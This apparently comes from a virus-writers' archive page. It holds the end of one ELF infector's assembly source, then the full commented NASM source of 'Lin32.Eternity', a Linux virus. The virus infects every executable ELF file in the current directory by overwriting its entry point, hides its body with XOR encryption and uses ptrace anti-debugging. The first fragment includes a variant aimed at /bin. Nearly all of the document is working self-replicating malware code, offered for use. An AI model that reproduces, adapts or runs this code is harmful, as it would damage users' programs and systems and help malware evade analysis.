next entry loop patch_phdr ; patching ehdr.e_shoff mov ebx,[esp+4] mov ecx,[ebx+E_SHOFF] ; e_shoff add dword [ebx+E_SHOFF],MAGIC_VIRUS_SIZE mov edx,[esp+4] mov ebx,ecx ; old e_shoff add edx,ecx ; move to shdr[0] ; initialize registers for patch_shdr mov ecx,[esp+28] ; ehdr.e_shnum mov eax,[esp+32] ; old p_filesz patch_shdr: cmp dword [edx+SHDR_SH_OFFSET],eax ; compare if ; shdr.sh_offset >= old p_filesz jge do_patch mov ebx,dword [edx+SHDR_SH_OFFSET] add ebx,dword [edx+SHDR_SH_SIZE] cmp ebx,eax ; if sh_offset + sh_size == old p_filesz je patch_sh_size ; patch the code segment jmp next_shdr_entry patch_sh_size: ; include trailing code in last section ; of code segment (should be .rodata) add ebx,MAGIC_VIRUS_SIZE ; increase lenght of .rodata jmp next_shdr_entry do_patch: add dword [edx+SHDR_SH_OFFSET],MAGIC_VIRUS_SIZE ; patch sh_offset next_shdr_entry: add edx,E_SHENTSIZE ; next SHDR entry loop patch_shdr fuck_em_all: mov ebx,[esp+LOCAL_STACK_SZ+PATH_LENGHT+2] ; fd xor ecx,ecx ; ecx=0=beginning of file xor edx,edx ; edx=0=SEEK_SET mov eax,SYS.LSEEK int 0x80 ; seek to end of code segment(old p_filesz) mov ecx,[esp+32] ; old p_filesz mov eax,SYS.LSEEK int 0x80 ; caution: lame coding style ;) ; now we'll need to "save" the original content ; of the file so we can copy it after infecting ; file...therefore we'll use sys.read.. ; like i said ; quite lame ;) mov eax,[esp+32] ; old p_filesz mov ebx,[esp+8] ; file lenght sub ebx,eax sub esp,ebx ; create temporary stack mov edx,ebx mov esi,edx ; ebx=edx=esi=difference ; seeking... mov ebx,[esp+edx+LOCAL_STACK_SZ+PATH_LENGHT+2] ; fd mov ecx,[esp+edx+32] ; old p_filesz xor edx,edx ; edx = 0 mov eax,SYS.LSEEK int 0x80 ; reading... mov edx,esi mov ecx,esp mov eax,SYS.READ int 0x80 write_me: ; we'll gonna seek again in the file... ; but this time with the aligned offset(needed ; to insert our virus code properly) mov ebx,[esp+esi+LOCAL_STACK_SZ+PATH_LENGHT+2] ; fd mov ecx,[esp+esi+32] ; old p_filesz ; ALIGN_UP(x) ... add ecx,15 and ecx,~15 xor edx,edx ; edx=0=SEEK_SET mov eax,SYS.LSEEK int 0x80 ; writting... --> pushy mov ecx,pushy mov edx,1 mov eax,SYS.WRITE int 0x80 ; writting... --> original entry point mov ecx,[esp+esi+48] push ecx mov ecx,esp mov edx,4 mov eax,SYS.WRITE int 0x80 pop ecx ; writting... --> till _exit mov ecx,main mov edx,len_till_exit mov eax,SYS.WRITE int 0x80 ; writting...--> virus_code="ret" mov ecx,virus_code mov edx,vircode_len mov eax,SYS.WRITE int 0x80 ; writting...--> after exit mov ecx,test_me mov edx,test_me_len mov eax,SYS.WRITE int 0x80 write_rest_of_file: ; seek after the virus code to insert the rest ; of the file ; seek to beginning of file xor ecx,ecx xor edx,edx mov eax,SYS.LSEEK int 0x80 mov ecx,[esp+esi+32] ; old p_filesz add ecx,MAGIC_VIRUS_SIZE xor edx,edx mov eax,SYS.LSEEK int 0x80 mov ecx,esp mov edx,esi mov eax,SYS.WRITE int 0x80 ; write rest of file add esp,esi ; restoring temporary stack no_insertion_space: unmap: mov eax,SYS.UNMMAP mov ebx,[esp+4] ; mmap addr mov ecx,[esp+8] ; file lenght int 0x80 add esp,LOCAL_STACK_SZ jmp close_target scan_return: add esp,GLOBAL_STRUCT_SZ ret _readdir_error: mov eax,SYS.CLOSE ; close directory mov ebx,[esp+STRUCT_DIRENT_SZ+PATH_LENGHT+2] add esp,STRUCT_DIRENT_SZ ; restore dirent structure mov eax,SYS.CHDIR ; move to previous current directory mov ebx,esp ; old PATH int 0x80 jmp _stat_error _open_error: jmp _stat_error _access_error: _stat_error: add esp,GLOBAL_STRUCT_SZ ; restore data allocated for our global structure ret len_till_exit equ $-main _exit: xor eax,eax inc eax int 0x80 test_me: %ifdef FUCK_USER payload db "[[ Cyneox/DCA (C) Copyright 2004 ]]!",0xA len equ $-payload %endif %ifdef FUCK_SYSTEM payload db "<< ..You've been binomitized!.. >> by cyneox",0xA len equ $-payload _system db "/bin",0x0 ; path where to search in when "fucking" up the whole system %endif pushy: push dword 0x0 virus_code: ret vircode_len equ $-virus_code test_me_len equ $-test_me

sources

Lin32.Eternity Cyneox ; _ _ ____ _ _ _ ;( ) (_) ___ __ ( __)( ) (_)( ) ;| | _ ____ |_ /|_ | | |_ | | ___ __ ____ _ | | _ _ ;( )_ ( )( __ )__)) /(_ _ ( _) ( _)( o_)( _)( __ )( )( _)( V ) ;/___\/_\/_\/_\\__//___\(_)/____\/_\ \( /_\ /_\/_\/_\/_\ ) / ; /_/ ; __ _ :: Intro ::::::::::::::::::::::: ; Hello out there! I dont't know ; _dP 9m_ why but in the last time I've ; _#P __Author__ 9#_ worked a lot with encryption ; d#@ 9#m tools, methods etc. Thisvirus ; d## Cyneox/rRlf/Helith ### should be the beginning of my ; J### ###L new VXing-era: poly engines, ; {###K J###K metamorphism etc. It took me a ; ]####K ___aaa___ J####F long time to write this virus ; __gmM######_ w#P"" ""9#m _d#####Mmw__ but as you see: I've made it!!! ; _g##############mZ_ __g##############m_ ; _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ :: Greets :::::::::::::::: ; a###"" ,Z"#####@" '######"\g ""M##m First of all I'd like to ;J#@" 0L "*## ##@" J# *#K thank SPTH for reminding ;#" __Date__ `# "_gmwgm_~ dF __Dedicated__ `#_ me not to stop coding. ;F "#_ ]#####F _dK JE Then a big fat "Thank ; 1.04.2005 *m__ ##### __g@" Caline, my F you" to rembrandt and ; "PJ#####LP" eternal love just dr3f who helped me while ;` 0######_ 4 ' coding the encryption ; _0########_ you !!! routine. ; . _d#####^#####m__ , And a (pi*BIG_FAT)^3 ; "*w_________am#####P" ~9#####mw_________w*" "I Love You" to Caline. ; ""9@#####@M"" ""P@#####@M"" Te Iubesc Iubita Mea!!! ; :: Overview ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; ; * General information * ; Name : Lin32.Eternity ; Author: Cyneox member of rRlf VX Group [http://www.rrlf.de.vu] ; Helith Network [https://vx.helith.net] ; Date : 01.04.2005 ; Size : 3432 ; ; * Technical details * ; Infection : the writes himself at entry point and the original data ; will be stored at EOF ; EPO : Since the memory has WRITE+EXECUTE flags we can simply ; copy the original data from EOF to the entry point of file ; and execute the original code. Data will be only in the memory ; overwriten. ; Target : ELF (Executable and Linking Format) files in the local directory ; Encryption : The virus body will be at run-time encrypted using the "Sliding ; key Encryption" methdod. The encryption will be randomly ; generated using the syscall time(). Then the return value will ; a be a little bit modified so that the encryption key isnt 100% ; dependent from the returned value. ; Decryption : The virus will compare bytewise if the file where its currently ; executed is encrypted. Thats important since the "dropper" ; contains no encrypted data so I had to implement sth for checking ; that ; ; :: About :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; Its about an ELF virus infecting all executables ELF files in the current ; directory. Our virus has a certain size , lets call it "len". If a file is ; found "len" bytes from the entry point of the target will be copied at the ; end of the file. Then our virus will copy himself at the entry point. ; For the first time I'm using a new art of EPO: Like I said "len" is the size ; of our virus body. After executing the virus code will "load" "len" bytes from ; EOF and will store the data at [ebp-d3lta+main], which is the entry point ; of our virus. ; ; Maybe you're asking yourself how is it possible to overwrite data in the ; memory. Well therefore I used mprotect for making the memory region writeable ; and executable. After loading the data from EOF only the data in the memory ; will be overwriten. Overwriting the data in the file will be senseless: The ; virus will be simply overwriten by the original code and thats silly ;) ; ; After infecting other files the infected file will encrypt his virus body ; beginning with [ebp-d3lta+start_virus]. At every execution of the file , a ; new encryption key will be generated making the ecryption routine safer. ; The "dropper" , the 0 generation , contains no encrypted data. Before ; decrypting the code several checks are done whether the virus body is encrypted ; or not. The virus will simply compare the first , 5th , 7th byte beginning ; from [ebp-d3lta+start_virus]. Just look at the code... Its the first virus ; I've commented so well... So have phun !! ;) ; ; :: Contact :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; W3B: http://cyneox.go.ro ; https://vx.helith.net ; https://vx.helith.net/cyneox/ ; ; M@il: cyneox@helith.net ; ; IRC : #lin32asm , #vxers ; #virus bits 32 global main section .text ;---++++++++++++++++++++++++++ main +++++++++++++++++++++++++++--- main: push eax pushad ; save all registers mov ebx,dword [esp+32+4+4] ; argv[0]=host file which is ; currently executed ; now we'll create position independent code ; so we'll have to calculate absolute addresses ; at run-time. ; ; this is taken from Elf-Virus-Writing-Tutorial ; from Alexander Bartolich: ; The instruction pointer is a register that holds th the address ; of the next instruction to execute. Unlike "real" registers ; there is no direct way to retrieve its value. A call pushes the ; current value of IP onto the stack and adds a relative offset ; to it. Offset 0 just continues with the following instruction. ; And if that instruction is a pop we load the the address of the ; pop instruction itself in a regular register. call d3lta ;---++++++++++++++++++++++++++ d3lt@ ++++++++++++++++++++++++++--- d3lta: pop ebp ; ebp should be addr of d3lta push ebx ; save argv[0] on stack is_encrypted: ; The "dropper" will contain ; no encrypted data...But the infected ; files will do contain encrypted data ;) ; Thats why I'm checking now if the code ; is encrypted or not.... db 0xb9 ; dummy opcode = "mov ecx," encryption_key: dd 8977h ; our dear encryption key ;------------------------------------------------------------- ; Source: objdump -d eternity ; ; 080480ef <start_virus>: ; 80480ef: b8 1a 00 00 00 mov $0x1a,%eax ; 80480f4: 31 db xor %ebx,%ebx ; 80480f6: 31 c9 xor %ecx,%ecx ; ;------------------------------------------------------------- lea ebx,[ebp-d3lta+start_virus] mov cl,[ebx] cmp byte cl,0xb8 ; b8 1a 00 00 00 mov $0x1a,%eax jne Decryption add ebx,5 mov cl,[ebx] cmp byte cl,0x31 ; 31 db xor %ebx,%ebx jne Decryption add ebx,2 mov cl,[ebx] cmp byte cl,0x31 ; 31 c9 xor %ecx,%ecx jne Decryption je start_virus ; if equal --> code isnt encrypted ;---++++++++++++++++++++++++++ Decryption ++++++++++++++++++++++++++--- Decryption: ; Still we're trying to write in the memory ; we'll have to mprotect that memory region ; and make it writable, because we want to ; save the decrypted code in that region. lea ebx, [ebp-d3lta+start_virus] ; const void *addr and ebx, 0FFFFF000h ; Since I dont really know the correct size ; of the code segment I'll asume its 0x3000 ;) mov ecx,0x1000 ; size_t len mov edx, 7 ; int prot PROT_READ|PROT_WRITE|PROT_EXEC mov eax,125 ; SYS.MPROTECT int 0x80 mov ecx,(eternity_end-start_virus)/4 mov ebx,dword [ebp-d3lta+encryption_key] lea esi,[ebp-d3lta+start_virus] mov edi,esi cld loop_it: lodsd ; move dword from [esi] to eax ; and increase "esi" by 4 xor eax,ebx ; the encryption "routine" ;) inc ebx ; increase ebx by 1 stosd ; move dword from "eax" to [edi] ; and increase "edi" by 4 loop loop_it ; ecx -= ecx ; while ecx>0 jmp loop_it_baby ;---+++++++++++++++++++++++ start_virus +++++++++++++++++++++++++--- start_virus: ; Unlike my usual infecting techniques here I'll use ; a new one: I'll put the host code onto the stack, ; mprotect it and then I'll execute this code. ; This is quite usefull since memory operations are ; faster than file/device operations. ; Check if our currently executed programm ; is beeing debugged...Therefore we'll use ; ptrace to check that. ;------------------------------------------------------------- ; ------------------> ANTI-DEBUGG Technique <----------------- ;------------------------------------------------------------- ; NAME ; ptrace - process trace ; ; SYNOPSIS ; #include <sys/ptrace.h> ; ; long ptrace(enum __ptrace_request request, pid_t pid, ; void *addr, void *data); ;------------------------------------------------------------ mov eax,26 ; SYS.PTRACE xor ebx,ebx ; PTRACE_TRACEME : ; Indicates that this process is to be traced ; by its parent xor ecx,ecx ; pid_t pid xor edx,edx inc edx ; void *addr xor esi,esi ; void *data int 0x80 test eax,eax jne near Bye_Bye ; Our programm is beeing ; debugged!!! ; Try to catch the signal SIGTRAP and to handle ; with it. We'll create a "handler"-function ; to handle with our catched signal. ;------------------------------------------------------------- ; ------------------> ANTI-DEBUGG Technique <----------------- ;------------------------------------------------------------- ; NAME ; signal - ANSI C signal handling ; ; SYNOPSIS ; #include <signal.h> ; ; typedef void (*sighandler_t)(int); ; ; sighandler_t signal(int signum, sighandler_t handler); ; ;------------------------------------------------------------ mov eax,48 ; SYS.SIGNAL mov ebx,0x5 lea ecx,[ebp-d3lta+handler] ; signal handler function mov ecx,esp ; handler int 0x80 pop ebx ; argv[0] mov ecx,eternity_end-hostmain ; get offset(distance) between ; start code and end code sub esp, ecx ; create space where to put code lea esi, [ebp-d3lta+hostmain] ; load "source" where to copy data ; from mov edi, esp ; destination rep movsb ; copy data from esi to edi jmp esp ; jump to copied code on the stack ;---++++++++++++++++++++++ hostmain +++++++++++++++++++++++++--- hostmain: push ebx ; argv[0] = host file ;---------------------------------- --------------------------- ; NAME ; mprotect - control allowable accesses to a region of memory ; ; SYNOPSIS ; #include <sys/mman.h> ; ; int mprotect(const void *addr, size_t len, int prot); ;------------------------------------------------------------- lea ebx, [ebp-d3lta+main] ; const voi *addr and ebx, 0FFFFF000h ; Since I dont really know the correct size ; of the code segment I'll asume its 0x3000 ;) mov ecx, 0x3000 ; size_t len mov edx, 7 ; int prot PROT_READ|PROT_WRITE|PROT_EXEC mov eax,125 ; SYS.MPROTECT int 0x80 ; opening host file in O_RDONLY only modus pop ebx ; argv[0] xor ecx, ecx ; ecx = 0 = O_RDONLY mov eax,5 ; SYS.OPEN int 0x80 ; checking for returned file descriptor cmp eax,0xFFFFF000 ; Another implementation: ja Bye_Bye ; cmp eax,0x0 ; jl Bye_Bye call point ; a real interesting method to declare db '.',0 ; data and initialize registers with it point:pop esi ; esi = "." push eax ; save file descriptor of host ; on the stack call search_in_direc ; go search for it baby! pop ebx ; saved fd of host ;---++++++++++++++++++ EternityHost ++++++++++++++++++++++++++--- ;--- Desc : Move to end of file and copy the original code ; to the original entry point and execute it. ;--- INPUT : ebx (containing file descriptor of host file) ;--- OUTPUT : [none] ;---------------------------------------------------------------- EternityHost: ;------------------------------------------------------------- ; NAME ; lseek - reposition read/write file offset ; ; SYNOPSIS ; #include <sys/types.h> ; #include <unistd.h> ; ; off_t lseek(int fildes, off_t offset, int whence); ;------------------------------------------------------------- xor edx, edx ; edx = 0 = SEEK_SET db 0xb9 ; opcode for "mov ecx," seek_bytes: dd 00000000h ; sizeof(target_file) mov eax,19 ; SYS.LSEEK int 0x80 ; The return value of sys.lseek will be checked... ; If sys.lseek seeked successfully to that offset ; that means that this code is currently executed ; by an infected file... ; If sys.lseek seeked unsuccessfully that means ; that this is the first execution of our virus... or eax, eax jnz restore_code ; execute original target code jmp Bye_Bye ; its the "dropper" --> exit ;---++++++++++++++++++++ restore_code ++++++++++++++++++++++++--- restore_code: ; Read "eternity_end-main" bytes from the end of the file ; and copy the data to [ebp-d3lta+main] ; Remember: Our code should be independent and that means ; that we're using only offsets. ;------------------------------------------------------------- ; NAME ; read - read from a file descriptor ; ; SYNOPSIS ; #include <unistd.h> ; ; ssize_t read(int fd,void *buf,size_t count); ;------------------------------------------------------------- lea ecx, [ebp-d3lta+main] ; void *buf push ecx pop esi mov edx, eternity_end-main ; size_t count mov eax,3 ; SYS.READ int 0x80 ; Close file descriptor... mov eax,6 ; SYS.CLOSE int 0x80 add esp,eternity_end-hostmain ; free stack mov dword [esp+32], esi ; its like an entrypoint popad ; restore registers ret ; return to host code ;---++++++++++++++++++++++++++ Bye_Bye ++++++++++++++++++++++++++--- Bye_Bye: mov eax,4 ; SYS.WRITE mov ebx,1 ; stdout lea ecx, [ebp-d3lta+Copyright] mov edx,dword [ebp-d3lta+copy_lenght] int 0x80 popad xor eax,eax inc eax int 0x80 ; SYS.EXIT ;################ END OF ETERNITYHOST ######################### ;---+++++++++++++++++++ search_in_direc +++++++++++++++++++++++--- ;--- DESC. : searches for files in esi (see below) ;--- INPUT : esi = name of directory where to search for files ;--- OUTPUT: [none] ;----------------------------------------------------------------- search_in_direc: mov ebx,esi ; directory name xor ecx,ecx ; ecx = 0 = O_RDONLY mov eax,0x5 int 0x80 ; SYS.OPEN cmp eax,0x0 jb near go_back ; Another implementation: ; or eax,eax ; jz go_back push eax ; push fd onto stack pop dword [ebp-d3lta+DirName] ; save fd to DirName ;---+++++++++++++++++++++ search4files ++++++++++++++++++++++++--- ;--- DESC. : loop label to search only regular files in esi ;--- INPUT : esi = name of file in the directory ;--- OUTPUT: [none] ;----------------------------------------------------------------- search4files: ;------------------------------------------------------------- ; NAME ; readdir - reads an directory entry ; ; SYNOPSIS ; #include <unistd.h> ; #include <linux/dirent.h> ; #include <linux/unistd.h> ; ; _syscall3(int, readdir, uint, fd, struct dirent *, dirp, uint, count); ; ; int readdir(unsigned int fd, struct dirent *dirp, unsigned int count); ;------------------------------------------------------------- lea ecx,[ebp-d3lta+DirentStruct] mov ebx,dword [ebp-d3lta+DirName] mov eax,89 int 0x80 ; SYS.READDIR or eax,eax ; Another implementation: jz go_back ; cmp eax,0x1 ; jne go_back add ecx,0xA ; file name in the DirentStruct mov esi,ecx ; save file name to esi ;------------------------------------------------------------- ; NAME ; lstat - list status of files ; ; SYNOPSIS ; #include <sys/types.h> ; #include <sys/stat.h> ; #include <unistd.h> ; ; int lstat(const char *file_name, struct stat *buf); ;------------------------------------------------------------- mov ebx,esi lea ecx,[ebp-d3lta+StatStruct] mov eax,107 int 0x80 ; SYS.LSTAT cmp eax,0x0 jb go_back movzx eax,word [ecx+0x8] ; get st_mode ; movzx will copy the 0 too mov ebx,eax ; Check if its a regular file.We dont want to infect ; directories ;) and ebx,0000F000h ; file mask cmp ebx,00008000h ; REG_FILE !? jnz next_entry ; Check if its user file and the most important ; thing: If it can be executed by the current user ;------------------------------------------------------------- ; Source: /usr/include/bits/stat.h ; ; #define __S_IEXEC 0100 /* Execute by owner. */ ; --> 0100(octal) = 40(hex) ;------------------------------------------------------------- and eax,00000040h ; eax = st_mode or eax,eax ; Another implementation: jz next_entry ; cmp eax,00000040h ; jne next_entry found_file: call Inf3ct_Fil3 ; heheh...my favourite function ; Dont accuse me for beeing sarcastic ;) next_entry: jmp search4files go_back: ret ;################ END OF SEARCH_IN_DIREC ######################### ;---++++++++++++++++++++++ Inf3ct_Fil3 ++++++++++++++++++++++++--- ;--- DESC. : Fuck up ELF executables ;--- INPUT : esi = ELF file ;--- OUTPUT: [none] ;----------------------------------------------------------------- Inf3ct_Fil3: ; Open ELF file for read & write xor ecx,ecx mov ecx,2 ; O_RWONLY mov ebx,esi ; ELF file name mov eax,5 int 0x80 ; SYS.OPEN cmp eax,0 ; Another implementation: jl near Inf3ct_failed ; cmp eax,0xfffff000 ; ja Inf3ct_failed mov dword [ebp-d3lta+ELF_FD],eax ; save fd to ELF_FD ; Now we must find out file's size in order ; to mmap it later.Therefore we'll use lssek() xor ecx,ecx ; ecx = 0 = offset mov edx,2 ; SEEK_END mov ebx,eax ; file descriptor mov eax,19 int 0x80 ; SYS.SEEK mov dword [ebp-d3lta+seek_bytes],eax ; "update" seek_bytes with ; sizeof file ; Prepare for Mmap_Fil3 mov ebx,[ebp-d3lta+ELF_FD] xchg eax,ecx ; ecx = sizeof file call Mmap_Fil3 cmp eax,-1 ; Another implementation: je near Mmap_failed ; inc eax ; jz near Mmap_failed mov dword [ebp-d3lta+Mmap_Addr],eax mov esi,dword [ebp-d3lta+Mmap_Addr] ; CAUTION: Viral Sequence beginns here. ; : Infection Countdown started... ;---+++++++++++++++++++++ check_if_ELF ++++++++++++++++++++++++--- check_if_ELF: ;------------------------------------------------------------- ; Source: hexdump -C elf_file | sed 1q ; ; 00000000 7f 45 4c 46 01 01 01 |.ELF...| ;------------------------------------------------------------- mov eax,dword [esi] cmp eax,0x464c457f ; hex for ".ELF" jne near Unmmap movzx eax,word [esi+40] ; EHDR size mov ebx,dword [esi+24] ; entry point movzx ecx,word [esi+44] ; ehdr.e_phnum movzx edx,word [esi+42] ; ehdr.e_phentsize mov edi,esi ; esi = edi = Mmap_Addr add edi,eax ; move to PHT( Program Header Table) ;------------------------------------------------------------- ; Source: readelf elf_file -l ; ; Program Headers: ; Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align ; PHDR 0x000034 0x08048034 0x08048034 0x000e0 0x000e0 R E 0x4 ; INTERP 0x000114 0x08048114 0x08048114 0x00013 0x00013 R 0x1 ; [Requesting program interpreter: /lib/ld-linux.so.2] ; LOAD 0x000000 0x08048000 0x08048000 0x00484 0x00484 R E 0x1000 ; LOAD 0x000484 0x08049484 0x08049484 0x00100 0x00104 RW 0x1000 ; DYNAMIC 0x000498 0x08049498 0x08049498 0x000c8 0x000c8 RW 0x4 ; NOTE 0x000128 0x08048128 0x08048128 0x00020 0x00020 R 0x4 ; STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4 ;------------------------------------------------------------- ; As we can see only those LOAD segments could be potencially ; virus infection targets. Its a very intelligent implementation ; to check if the entry point is smaller than p_paddr + p_memsz ; since we want to insert our virus after the entry point ;) ; On UNIX platforms there are some exotic ELF file samples: a few of ; them have the data segment and the code segment in one segment: ; the code segment.Well only VXer do crazy things like this but ; but it was just an example... :P ; Now we'll search for the PHDR entry,where p_paddr + ; p_memsz > entry point get_phdr: mov eax,dword [edi+12] ; phdr.p_paddr add eax,dword [edi+20] ; p_memsz cmp ebx,eax ; if entry point is smaller ; than p_paddr + p_memsz then jump jl got_phdr add edi,edx ; move to next PHDR entry loop get_phdr jmp Unmmap ; if nothing found then exit ;---++++++++++++++++++++++++++ got_phdr ++++++++++++++++++++++++++--- got_phdr: mov esi,dword [esi+24] ; entry point ; Figure out offset to entry code by subtracting the ; PhsyAddr from the code segment from the entry point sub esi,dword [edi+8] ; edi+8 = PhysAddr mov ebx,esi add esi,dword [ebp-d3lta+Mmap_Addr] ; jump to entry point in the mmap ; file ; Check if our target file has been already infected ; by Linux.Eternity (c) by Cyneox ;)) mov eax,dword [ebp-d3lta+main] cmp dword [esi],eax jz near Unmmap ; already infected :( ; Check if there is enough place where to insert ; our viral code... mov eax,dword [edi+20] sub eax,ebx mov ecx,eternity_end-main cmp eax,ecx jb near Unmmap ; segment too small ; Creating a stack frame where to insert ; our host code... sub esp,eternity_end-main ; Write host code into that frame mov ebx,esi ; esi = source mov ecx,eternity_end-main mov edx,ecx ; lenght mov edi,esp ; destination rep movsb ; copy from esi to edi ; Write viral code at the entry point of ; mmaped file... ; First of all write until "start_virus"... xchg ebx,edi ; ebx=esp ; edi=esi ; Generate random number used as encryption key ; time() returns the time since the Epoch (00:00:00 UTC, ; January 1, 1970), measured in seconds. ; Those seconds represent a wonderfull randomly generated ; encryption key ... ;) mov eax,13 ; SYS.TIME mov ebx,dword [ebp-d3lta+Time] int 0x80 ; eax will contain a radomly generated number... and eax,0x9d2c and eax,0xefc6 mov dword [ebp-d3lta+encryption_key],eax ; update encryption key lea esi,[ebp-d3lta+main] mov ecx,start_virus-main rep movsb ; Write after "start_virus"... add edi,ecx ; update destination push edi lea esi,[ebp-d3lta+start_virus] mov ecx,eternity_end-start_virus rep movsb ;---+++++++++++++++++++++ Encryption ++++++++++++++++++++++++--- ; Using "Sliding Key Encryption" method... ; Its actually a "xor"-encryption while increasing the encryption key ; by 1. The cool thing about this method is following: ; ; Lets say we have this data : AABCC ; And our encryption key is : KBKBK ; ; In the first loop A will be encrypted with K , but in the second ; loop A will be encrypted with B. Thats a sory of polyalphabetical ; enciphering (pls visit my site to read something about that enciphering ; method). And that makes our encryption even more securer. ; If somebody looks at this encrypted code, they won't be able to tell that ; the two characters are the same when unencrypted. Encryption: pop edi mov esi,edi mov ecx,(eternity_end-start_virus)/4 mov ebx,dword [ebp-d3lta+encryption_key] cld loop_encrypt: lodsd ; load dword from [esi] to [eax] xor eax,ebx ; encryption inc ebx ; increase ebx stosd ; store dword from [eax] to [edi]=[esi] loop loop_encrypt ; loop until ECX>0 lea esi,[ebp-d3lta+main] ; Now we'll unmmap our target and write the original ; host code at the end of the file... mov ecx,dword [ebp-d3lta+seek_bytes] ; sizeof file mov ebx,dword [ebp-d3lta+Mmap_Addr] mov eax,91 ; SYS.UNMMAP int 0x80 ;------------------------------------------------------------- ; Source: ls -l ./gcc ; -rwxr-xr-x 1 cyneox users 98665 2005-03-20 17:09 gcc ; ; Size of target before virus infection... ;------------------------------------------------------------- ; Write host code at EOF mov ecx,esp mov edx,eternity_end-main mov ebx,dword [ebp-d3lta+ELF_FD] ; file descriptor mov eax,0x4 ; SYS.WRITE int 0x80 ;------------------------------------------------------------- ; Source: ls -l ./gcc ; -rwxr-xr-x 1 cyneox users 100178 2005-03-20 17:11 gcc ; ; Size of target AFTER virus infection ... ;------------------------------------------------------------- add esp,eternity_end-main ; restore frame ; This is a "copyright" function to ; append my message. sub esp,dword [ebp-d3lta+Appendix_lenght] mov edi,esp ; direction lea esi,[ebp-d3lta+Appendix] mov ecx,dword [ebp-d3lta+Appendix_lenght] mov edx,ecx rep movsb mov edx,ebx mov eax,4 ; SYS.WRITE mov ebx,edx ; write to file descriptor mov ecx,esp ; write from stack mov edx,dword [ebp-d3lta+Appendix_lenght] int 0x80 add esp,dword [ebp-d3lta+Appendix_lenght] ; restore stack jmp Mmap_failed ;---++++++++++++++++++++++++++ Unmmap ++++++++++++++++++++++++++--- Unmmap: mov ecx,dword [ebp-d3lta+seek_bytes] ; size mov ebx,dword [ebp-d3lta+Mmap_Addr] ; mmap addr mov eax,91 int 0x80 ; SYS.UNMMAP Mmap_failed: mov ebx,dword [ebp-d3lta+ELF_FD] mov eax,6 int 0x80 ; SYS.CLOSE Inf3ct_failed: ret ;################# END OF INF3CT_FIL3 ############################ ;---++++++++++++++++++++++ Mm@p_Fil3 ++++++++++++++++++++++++++--- ;--- DESC. : Map file in the memory ;--- INPUT : ebx = file descriptor ; : ecx = size ;--- OUTPUT: eax = addr of memory map ;----------------------------------------------------------------- Mmap_Fil3: ;------------------------------------------------------------- ; NAME ; mmap - save data into memory ; ; SYNOPSIS ; #include <unistd.h> ; #include <sys/mman.h> ; ; void * mmap(void *start, size_t length, int prot , int flags, int fd, ; off_t offset); ;------------------------------------------------------------- lea esi,[ebp-d3lta+MmapStruct] mov dword [esi+4],ecx ; sizeof file mov dword [esi+16],ebx ; file descriptor xchg ebx,esi mov eax,90 int 0x80 ; SYS.MMAP ; Another implemenatation; ; mov eax,90 ; mov edx,ebx ; sub esp,24 ; mov dword [esp],0x0 ; mov dword [esp+4],ecx ; mov dword [esp+8],3 ; mov dword [esp+12],1 ; mov dword [esp+16],edx ; mov dword [esp+20],0 ; mov ebx,esp ; int 0x80 ; add esp,24 ret ;---++++++++++++++++++++++++++ __exit ++++++++++++++++++++++++++--- __exit: xor eax,eax ; eax = 0 inc eax ; eax = 1 int 0x80 ; SYS.EXIT ;---+++++++++++++++++++++++ host_end ++++++++++++++++++++++++++--- host_end: ;---++++++++++++++++++++++++ handler +++++++++++++++++++++++++--- handler: push ebp mov esp,ebp ; simply do nothing while program ; receives signal SIGTRAP pop ebp ret DirName dd 00000000h ; directory name ELF_FD dd 00000000h ; ELF file descriptor Mmap_Addr dd 00000000h ; MMAP address Time dd 00000000h ; variable used by syscall time() Copyright: db ":::.Lin32.Eternity by Cyneox/rRlf.:::",0xa,0x0 msg: db "Te iubesc, te doresc, mai mult ca viata mea...",0xa,0x0 db "Numai tu si Dumnezeu sunteti inima mea.",0xa,0xa,0x0 db "Caline, my eternal love just for you!",0xa,0x0 db "by Cyneox/rRlf [24.03.2005]",0xa,0x0 copy_lenght dd $-Copyright Appendix: db "Lin32.Eternity by Cyneox/rRlf/Helith [March 2005]",0xa,0x0 Appendix_lenght dd $-Appendix copyright_end: ;----------------------------------------------------------------- ; Source: /usr/include/asm/stat.h ; struct stat { ; unsigned short st_dev; ; unsigned short __pad1; ; unsigned long st_ino; ; unsigned short st_mode; ; unsigned short st_nlink; ; unsigned short st_uid; ; unsigned short st_gid; ; unsigned short st_rdev; ; unsigned short __pad2; ; unsigned long st_size; ; unsigned long st_blksize; ; unsigned long st_blocks; ; unsigned long st_atime; ; unsigned long __unused1; ; unsigned long st_mtime; ; unsigned long __unused2; ; unsigned long st_ctime; ; unsigned long __unused3; ; unsigned long __unused4; ; unsigned long __unused5; ;}; ;-------------------------------------------------------------- StatStruct: dw 0000h ; st_dev dw 0000h ; __pad1 dd 00000000h ; st_ino dw 0000h ; st_mode dw 0000h ; st_nlink dw 0000h ; st_uid dw 0000h ; st_gid dw 0000h ; st_rdev dw 0000h ; __pad2 dd 00000000h ; st_size dd 00000000h ; st_blksize dd 00000000h ; st_blocks dd 00000000h ; st_atime dd 00000000h ; __unused1 dd 00000000h ; st_mtime dd 00000000h ; __unused2 dd 00000000h ; st_ctime dd 00000000h ; __unused3 dd 00000000h ; __unused4 dd 00000000h ; __unused5 ;-------------------------------------------------------------- ; Source: /usr/include/bits/dirent.h ; struct dirent ; { ;#ifndef __USE_FILE_OFFSET64 ; __ino_t d_ino; ; __off_t d_off; ;#else ; __ino64_t d_ino; ; __off64_t d_off; ;#endif ; unsigned short int d_reclen; ; unsigned char d_type; ; char d_name[256]; /* We must not include limits.h! */ ; }; ;-------------------------------------------------------------- DirentStruct: dd 00000000h ; d_ino dd 00000000h ; d_off dw 0000h ; d_reclen times 256 db 00h ; d_name[256] MmapStruct: dd 00000000h ; addr dd 00000000h ; lenght dd 00000003h ; prot: PROT_WRITE|PROT_READ dd 00000001h ; flags: MAP_PRIVATE dd 00000000h ; file descriptor(fd) dd 00000000h ; offset testing times 11 db 00h eternity_end:

articles

